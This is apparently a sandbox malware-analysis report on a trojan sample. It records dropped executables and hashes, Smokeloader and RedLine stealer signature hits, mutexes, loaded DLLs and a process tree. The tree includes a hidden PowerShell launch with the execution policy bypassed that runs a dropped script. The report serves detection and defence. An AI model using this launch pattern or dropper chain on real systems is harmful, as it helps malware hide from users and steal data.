Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C7270	14_2_004C7270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E6210	14_2_004E6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D82CB	14_2_004D82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FD340	14_2_004FD340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FB350	14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C6B70	14_2_004C6B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004CFB10	14_2_004CFB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E4BF0	14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E33B6	14_2_004E33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004DEC06	14_2_004DEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E0CB7	14_2_004E0CB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C3DD0	14_2_004C3DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C5DE0	14_2_004C5DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FB5A0	14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D4E68	14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D3678	14_2_004D3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004F3680	14_2_004F3680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004D5E97	14_2_004D5E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004FB700	14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004C1F10	14_2_004C1F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 14_2_004E3F97	14_2_004E3F97

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\3530.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\6E8A.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\7C81.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 004CFCA0 appears 202 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 004C93B0 appears 39 times

Source: 7C81.exe.2.dr

Static PE information: Number of sections : 12 > 10

Source: 6E8A.exe.2.dr	Static PE information: No import functions for PE file found
Source: 3530.exe.2.dr	Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000002.2095582375.0000000002448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sashibt.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@16/14

Source: C:\Users\user\AppData\Local\Temp\3530.exe

Code function: 8_2_00007FF7A0A0F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,

8_2_00007FF7A0A0F5B0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0271455A CreateToolhelp32Snapshot,Module32First,

0_2_0271455A

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004E9C80 CoCreateInstance,

14_2_004E9C80

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sashibt

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\3530.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7C81.exe

File opened: C:\Windows\system32\5a55af7216446d40d953e278edaf5aa8cd73f3383fdbcf4ae41b21e0f53c23eaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 42%

Source: 7C81.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: 7C81.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: 7C81.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: 7C81.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sashibt C:\Users\user\AppData\Roaming\sashibt
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe C:\Users\user\AppData\Local\Temp\3530.exe
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7C81.exe C:\Users\user\AppData\Local\Temp\7C81.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe C:\Users\user\AppData\Local\Temp\6E8A.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe C:\Users\user\AppData\Local\Temp\3530.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7C81.exe C:\Users\user\AppData\Local\Temp\7C81.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe C:\Users\user\AppData\Local\Temp\6E8A.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3530.exe "C:\Users\user\AppData\Local\Temp\3530.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Section loaded: vcruntime140_clr0400.dll
